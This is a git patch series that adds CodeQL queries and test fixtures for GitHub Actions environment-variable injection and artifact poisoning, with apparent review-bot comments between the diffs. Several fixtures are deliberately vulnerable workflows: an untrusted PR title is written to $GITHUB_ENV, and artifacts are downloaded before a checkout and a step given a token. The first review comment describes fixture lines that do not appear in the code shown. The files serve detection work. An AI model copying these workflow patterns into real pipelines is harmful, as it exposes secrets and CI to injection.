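Review bot: The tainted write in this fixture, `echo "pr_number=$(cat NR)" >> $GITHUB_ENV`, contains no `${{ }}` expression, so `writeToGithubEnvSink` from this same commit, which requires `run.getAnScriptExpr() = expr` and the expression text inside the captured value, cannot mark it as a sink; the attacker-controlled data arrives through the artifact downloaded by the `actions/github-script` step, not through an expression. Without an `.expected` file pinning this as a known miss, the fixture silently documents a case the query does not cover. A comment under the two reference URLs, `# Known gap: the value comes from an artifact file (cat NR), not from a ${{ }} expression; not detected by writeToGithubEnvSink yet`, would keep that visible until artifact-to-$GITHUB_ENV flow is modelled.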
@@ -0,0 +1,64 @@ +# https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project +# https://github.com/google/orbit/commit/6cd71a3f1eec098d0de61bf9bb742737cb3aa5fa +name: report-checks +on: + workflow_run: + workflows: ['checks'] + types: + - completed +permissions: read-all +jobs: + + report-clang-tidy-diff: + permissions: + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Download PR metadata + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: pr_metadata + if_no_artifact_found: 'ignore' + - name: Download clang_tidy_fixes + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: clang_tidy_fixes + if_no_artifact_found: 'ignore' + - name: Set found_files + id: set_found_files + run: | + if [ -f clang-tidy-fixes.yml ] && [ -f pr_number.txt ] && [ -f pr_head_repo.txt ] && [ -f pr_head_ref.txt ]; then + echo "found_files=true" >> $GITHUB_OUTPUT + else + echo "found_files=false" >> $GITHUB_OUTPUT + fi + - run: | + echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV + echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV + if: steps.set_found_files.outputs.found_files == 'true' + - uses: actions/checkout@v3 + if: steps.set_found_files.outputs.found_files == 'true' + with: + repository: ${{ env.PR_HEAD_REPO }} + ref: ${{ env.PR_HEAD_REF }} + persist-credentials: false + - name: Redownload clang_tidy_fixes + if: steps.set_found_files.outputs.found_files == 'true' + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + 
workflow_conclusion: '' + name: clang_tidy_fixes + if_no_artifact_found: 'ignore' + - uses: platisd/clang-tidy-pr-comments@89ea1b828cdac1a6ec993d225972adea3b8841b6 + if: steps.set_found_files.outputs.found_files == 'true' + with: + github_token: ${{ secrets.ORBITPROFILER_BOT_PAT }} + clang_tidy_fixes: clang-tidy-fixes.yml + pull_request_id: ${{ env.PR_NUMBER }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref new file mode 100644 index 000000000000..dafc2b38fc46 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref new file mode 100644 index 000000000000..4562004b9904 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/PrivilegedEnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 5ad00b17db93..d656fb65ea51 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -1,4 +1,4 @@ -jn: push +on: push jobs: job0: @@ -36,7 +36,7 @@ jobs: if: ${{ always() }} - needs: job1 + needs: job steps: - id: sink From bdfd46111fb7823a61113045af6bda60031748bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:51:26 +0200 Subject: [PATCH 138/707] Only triggered on non-pull_request events --- ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) 
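Review bot: The second inter-job0.yml hunk changes `needs: job1` to `needs: job`, but nothing else in this commit renames a job, so the dependency now appears to point at a job that does not exist in the fixture; the commit title ("resolve conflicts") and the later hunk in this series that restores `needs: job1` suggest the edit was accidental. Only the `-jn: push` / `+on: push` typo fix in the first hunk looks intended. The rest of inter-job0.yml is outside this hunk, so the existence of a job named `job` cannot be confirmed from here.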
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index bce9494a43f2..6508b4586292 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,11 +16,16 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w where EnvVarInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 9807cf87d52df816ec38ba35833687b4abf6ef12 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:52:46 +0200 Subject: [PATCH 139/707] resolve conflicts --- ql/lib/ext/trilom_file-changes-action.model.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 ql/lib/ext/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml new file mode 100644 index 000000000000..db3d37597827 --- /dev/null +++ b/ql/lib/ext/trilom_file-changes-action.model.yml 
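Review bot: `isSingleTriggerWorkflow` is a new public predicate with no QLDoc; suggest `/** Holds if the event named by trigger is the only event that triggers workflow w. */` above it. The replacement condition `not isSingleTriggerWorkflow(w, "pull_request")` is coarser than the `hasTriggerEvent(source...getATriggerEvent())` check it removes: a workflow with `on: [pull_request, push]` is now reported as privileged even when the source (e.g. `github.event.pull_request.title`) is only populated in the unprivileged `pull_request` run, so if that is intended it deserves a comment, and otherwise the source's own trigger event should still be consulted. The aggregate can also be written `count(w.getATriggerEvent()) = 1`.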
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ # https://github.com/trilom/file-changes-action
+ # if `prNumber` is provided, the trigger event dont need to be `pull_request_target`
+ - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"]
From cc16318a9062fd05027fe4827d25bd9d84b0c7e3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 1 Apr 2024 10:56:03 +0200
Subject: [PATCH 140/707] Make new trilom source compliant with new sources
---
 ql/lib/ext/trilom_file-changes-action.model.yml | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)
diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml
index db3d37597827..77706e266fed 100644
--- a/ql/lib/ext/trilom_file-changes-action.model.yml
+++ b/ql/lib/ext/trilom_file-changes-action.model.yml
@@ -3,9 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- # https://github.com/trilom/file-changes-action
- # if `prNumber` is provided, the trigger event dont need to be `pull_request_target`
- - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"]
- - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"]
- - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"]
- - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files"]
From 152d29da3859d054b46eb09f17a17b849fa79cd9 Mon Sep 17 00:00:00 2001
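Review bot: The two comment lines removed from under `data:` (the link to the action and the note that a supplied `prNumber` means the trigger need not be `pull_request_target`) are the only record of why these four outputs are modeled as sources for every trigger, and dropping the extra `"*"` column does not make them obsolete. Keep them above the rows, e.g. `# https://github.com/trilom/file-changes-action` and `# if prNumber is provided, the trigger event need not be pull_request_target`.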
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 18:53:37 +0200 Subject: [PATCH 141/707] Add Artifact poisoning and Env Injection queries --- ql/lib/codeql/actions/Ast.qll | 6 ++- ql/lib/codeql/actions/ast/internal/Ast.qll | 26 ++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 10 ++-- .../dataflow/internal/DataFlowPrivate.qll | 20 +++++++- .../security/ArtifactPoisoningQuery.qll | 50 +++++++++++++++++++ .../actions/security/EnvVarInjectionQuery.qll | 11 ++-- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 26 ++++++++++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 2 +- .../CWE-077/.github/workflows/test1.yml | 2 + .../Security/CWE-077/EnvVarInjection.expected | 6 +++ .../PrivilegedEnvVarInjection.expected | 6 +++ .../CWE-094/.github/workflows/inter-job0.yml | 2 +- .../CWE-094/.github/workflows/test1.yml | 27 ++++++++++ .../Security/CWE-094/CodeInjection.expected | 6 +++ .../CWE-094/PrivilegedCodeInjection.expected | 6 +++ .../.github/workflows/artifactpoisoning1.yml | 34 +++++++++++++ .../.github/workflows/artifactpoisoning2.yml | 21 ++++++++ .../.github/workflows/artifactpoisoning3.yml | 19 +++++++ .../.github/workflows/artifactpoisoning4.yml | 25 ++++++++++ .../CWE-829/.github/workflows/test1.yml | 27 ++++++++++ .../CWE-829/ArtifactPoisoning.expected | 4 ++ .../Security/CWE-829/ArtifactPoisoning.qlref | 2 + .../CWE-829/UnpinnedActionsTag.expected | 1 + 23 files changed, 313 insertions(+), 26 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml create mode 100644 
ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ecc0ad16f5f4..d865eb54905b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -38,7 +38,9 @@ class AstNode instanceof AstNodeImpl { Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } -class ScalarValue extends AstNode instanceof ScalarValueImpl { } +class ScalarValue extends AstNode instanceof ScalarValueImpl { + string getValue() { result = super.getValue() } +} class Expression extends AstNode instanceof ExpressionImpl { string expression; @@ -218,6 +220,8 @@ abstract class Uses extends AstNode instanceof UsesImpl { string getVersion() { result = super.getVersion() } + string getArgument(string argName) { result = super.getArgument(argName) } + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 3fa1769e762d..a1470a41dd0f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -128,6 +128,8 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { override Location getLocation() { result = value.getLocation() } override YamlScalar getNode() { result = value } + + string getValue() { result = value.getValue() } } class ExpressionImpl extends AstNodeImpl, TExpressionNode { 
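Review bot: The new public members `ScalarValue.getValue()` and `Uses.getArgument(string argName)` in Ast.qll, and `ScalarValueImpl.getValue()` in the internal Ast.qll hunk, are added without QLDoc while being the API other queries in this commit call. Suggest `/** Gets the string value of this scalar node. */` on both `getValue()` and `/** Gets the plain scalar value of the with-argument named argName, if it is one. */` on `getArgument`, since the implementation added further down in this commit only resolves scalar values.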
@@ -687,7 +689,19 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); - abstract ExpressionImpl getArgumentExpr(string key); + /** Gets the argument expression for the given key. */ + string getArgument(string key) { + exists(ScalarValueImpl scalar | + scalar.getNode() = this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) and + result = scalar.getValue() + ) + } + + /** Gets the argument expression for the given key (if it exists). */ + ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = + this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) + } } /** @@ -719,11 +733,6 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } - /** Gets the argument expression for the given key. */ - override ExpressionImpl getArgumentExpr(string key) { - result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) - } - override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } @@ -763,11 +772,6 @@ class ExternalJobImpl extends JobImpl, UsesImpl { else none() ) } - - /** Gets the argument expression for the given key. */ - override ExpressionImpl getArgumentExpr(string key) { - result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) - } } class RunImpl extends StepImpl { diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index c10334436aa7..343578168127 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
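Review bot: The QLDoc on the new `getArgument(string key)` reads "Gets the argument expression for the given key", but the predicate returns the scalar string value of the `with:` entry, not an expression; the correct wording is already on `getArgumentExpr` just below. Suggest `/** Gets the scalar string value of the with-argument named key, if any. */`. Since `getArgumentExpr` is no longer abstract and the two overrides in `UsesStepImpl` and `ExternalJobImpl` are deleted in the following hunks, any other `UsesImpl` subclass outside this diff that still marks it `override` would presumably stop compiling — worth a grep.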
@@ -33,12 +33,12 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ -predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run r, string varName, string output | +predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getInScopeEnvVarExpr(varName) = pred.asExpr() and + run.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript() and + script = run.getScript() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or @@ -46,6 +46,6 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data ) and line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and - succ.asExpr() = r + succ.asExpr() = run ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 11b8bf94bca5..b5123069f134 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
@@ -232,8 +232,24 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) + or astTo.getTarget() = astFrom + or + // e.g: + // - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + // - run: echo ${{ env.ISSUE_KEY }} + exists(Run run, string script, Expression expr, string line, string key, string value | + run.getScript() = script and + run.getAnScriptExpr() = expr and + line = script.splitAt("\n") and + key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + value.indexOf(expr.getRawExpression()) > 0 and + key = astTo.getFieldName() and + expr = astFrom and + expr.getEnclosingWorkflow() = run.getEnclosingWorkflow() + ) ) ) } @@ -312,7 +328,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or externallyDefinedStoreStep(node1, node2, c) or - runEnvToScriptStoreStep(node1, node2, c) + envToOutputStoreStep(node1, node2, c) } /** diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll new file mode 100644 index 000000000000..abf36fd7da34 --- /dev/null +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
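Review bot: `value.indexOf(expr.getRawExpression()) > 0` misses the case where the expression is the entire value, e.g. `echo ISSUE_KEY=${{ github.event.pull_request.title }} >> $GITHUB_ENV`, because `indexOf` returns 0 there; it should be `>= 0` (or `exists(value.indexOf(expr.getRawExpression()))`). The same `> 0` test and the same pair of regex literals are repeated in `writeToGithubEnvSink` in EnvVarInjectionQuery.qll (next file section), so factoring the `echo KEY=VALUE >> $GITHUB_ENV` parsing into one shared predicate would keep the two from diverging. The new disjunct also never relates `astTo` (the `env.KEY` read) to the job of `run`; since `GITHUB_ENV` is job-scoped, the conjunct `expr.getEnclosingWorkflow() = run.getEnclosingWorkflow()` (already implied by `run.getAnScriptExpr() = expr`) looks like it was meant to be a same-job check on `astTo`. Finally the pattern only accepts a bare `$GITHUB_ENV`, while the quoted and `${...}` spellings that the `GITHUB_OUTPUT` comment in FlowSteps.qll acknowledges go unmatched.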
@@ -0,0 +1,50 @@
+import actions
+
+class ArtifactDownloadStep extends Step {
+ ArtifactDownloadStep() {
+ // eg: - uses: dawidd6/action-download-artifact@v2
+ this.(UsesStep).getCallee() = "dawidd6/action-download-artifact" and
+ // exclude downloads outside the current directory
+ // TODO: add more checks to make sure the artifacts can be controlled
+ not exists(this.(UsesStep).getArgumentExpr("path"))
+ or
+ // eg:
+ // - uses: actions/github-script@v6
+ // with:
+ // script: |
+ // let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ // owner: context.repo.owner,
+ // repo: context.repo.repo,
+ // run_id: context.payload.workflow_run.id,
+ // });
+ // let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ // return artifact.name == ""
+ // })[0];
+ // let download = await github.rest.actions.downloadArtifact({
+ // owner: context.repo.owner,
+ // repo: context.repo.repo,
+ // artifact_id: matchArtifact.id,
+ // archive_format: 'zip',
+ // });
+ this.(UsesStep).getCallee() = "actions/github-script" and
+ exists(string script |
+ this.(UsesStep).getArgument("script") = script and
+ script.matches("%listWorkflowRunArtifacts(%") and
+ script.matches("%downloadArtifact(%")
+ )
+ or
+ // eg: - run: gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ this.(Run).getScript().splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*")
+ or
+ // eg:
+ // run: |
+ // artifacts_url=${{ github.event.workflow_run.artifacts_url }}
+ // gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact
+ // do
+ // IFS=$'\t' read name url <<< "$artifact"
+ // gh api $url > "$name.zip"
+ // unzip -d "$name" "$name.zip"
+ // done
+ this.(Run).getScript().splitAt("\n").matches("%github.event.workflow_run.artifacts_url%")
+ }
+}
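Review bot: `ArtifactDownloadStep` is a public class without QLDoc; suggest `/** A step that downloads an artifact from another workflow run, via dawidd6/action-download-artifact, actions/github-script or the gh CLI. */`. In the first disjunct, `not exists(this.(UsesStep).getArgumentExpr("path"))` appears to only see `${{ }}` expressions (per the `getArgumentExpr` definition in this commit), so a literal `path: out` argument is not excluded; `getArgument("path")`, also introduced in this commit, would cover the literal case. The comment "exclude downloads outside the current directory" overstates the check, which merely tests for the presence of a `path` argument, and the exclusion is not applied to the three other download patterns — the TODO should say so.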
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index dbae3f48f800..330920852c1e 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -4,12 +4,13 @@ private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow -predicate writeToGithubEnvSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string script, string line, string value | +predicate writeToGithubEnvSink(DataFlow::Node exprNode, string key, string value) { + exists(Expression expr, Run run, string script, string line | script = run.getScript() and line = script.splitAt("\n") and - value = line.regexpCapture("echo\\s+.*\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - expr = sink.asExpr() and + key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + expr = exprNode.asExpr() and run.getAnScriptExpr() = expr and value.indexOf(expr.getRawExpression()) > 0 ) @@ -17,7 +18,7 @@ predicate writeToGithubEnvSink(DataFlow::Node sink) { private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - writeToGithubEnvSink(this) or + writeToGithubEnvSink(this, _, _) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql new file mode 100644 index 000000000000..5b0c4fc4e69b --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql 
@@ -0,0 +1,26 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 9.3 + * @id actions/artifact-poisoning + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery + +from LocalJob job, ArtifactDownloadStep download, Step run +where + job.getWorkflow().getATriggerEvent() = "workflow_run" and + (run instanceof Run or run instanceof UsesStep) and + exists(int i, int j | + job.getStep(i) = download and + job.getStep(j) = run and + i < j + ) +select download, "Potential artifact poisoning." diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index b33c7325526d..86b80c672157 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -5,7 +5,7 @@ * that is able to push to the base repository and to access secrets. * @kind problem * @problem.severity warning - * @precision low + * @precision medium * @security-severity 9.3 * @id actions/untrusted-checkout * @tags actions diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index b2780d54c045..3cab86f3171b 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -21,5 +21,7 @@ jobs: - name: Extract Jira Key run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + - name: Sink + run: echo ${{ env.ISSUE_KEY }} diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected new file mode 100644 index 000000000000..2d96ec5a4352 --- /dev/null 
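Review bot: The alert `select download, "Potential artifact poisoning."` discards the `run` step that the `where` clause finds, so a reader cannot tell which later step consumes the downloaded artifact; reporting it as a placeholder, e.g. `select download, "Potential artifact poisoning: the downloaded artifact may be used by $@.", run, run.toString()`, would make the result actionable. Naming a variable `run` when it may be a `UsesStep` is confusing — `Step consumer` reads better — and the `(run instanceof Run or run instanceof UsesStep)` conjunct looks redundant if those are the only `Step` kinds, which cannot be confirmed from here. The `@description` wording "influence on consequent steps" should read "influence subsequent steps".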
+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected new file mode 100644 index 000000000000..2692d03eefec --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index d656fb65ea51..1ad46b0f6eb1 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml 
@@ -36,7 +36,7 @@ jobs: if: ${{ always() }} - needs: job + needs: job1 steps: - id: sink diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml new file mode 100644 index 000000000000..3cab86f3171b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 2ad850548037..1fad288860e7 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
